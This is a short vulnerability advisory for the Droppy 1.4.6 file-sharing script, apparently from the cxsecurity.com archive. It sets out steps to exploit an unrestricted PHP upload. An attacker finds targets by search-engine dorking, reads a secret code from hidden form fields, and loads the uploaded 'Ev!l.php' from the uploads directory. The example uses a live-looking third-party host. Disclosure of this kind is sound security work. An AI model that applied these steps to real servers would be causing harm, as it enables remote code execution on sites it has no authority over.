Amazon S3 Droppy v 1.4.6 File Upload Vulnerability

2018.01.06
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

============================================================================================================================ | # Title : Amazon S3 Droppy v 1.4.6 File Upload Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 Français V.(Pro) | | # Version : 1.4.6 | | # Vendor : https://codecanyon.net/item/droppy-online-file-sharing/10575317 | | # Dork : n/a | ============================================================================================================================ poc : Droppy is an online file sharing platform that can be used to share multiple files among friends, family and colleagues. The files can be sent by email or an url that can be shared with everyone you would like to. [+] Dorking İn Google Or Other Search Enggine [+] Select file Ev!l.php and send it to your e-mail or to direct link. [+] script save a copy of your file in the web server in dir " uploads/" with a secret code [+] when you click in link to download your file right click and choose view source of download link not the page of your email: Exampel : view-source:http://droppy.proxibolt.com/PrHEtFg Line 99 , 100 , 101 <input type="hidden" name="action" id="action" value="download"> <input type="hidden" name="secret_code" id="secret_code" value="c40c11023e25cb7cfcba1345c4e26f72"> <input type="hidden" name="download_id" id="download_id" value="PrHEtFg"> [+] add the secret code with name of your file that give you access http://127.0.0.1/Droppy/uploads/c40c11023e25cb7cfcba1345c4e26f72-x.php Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top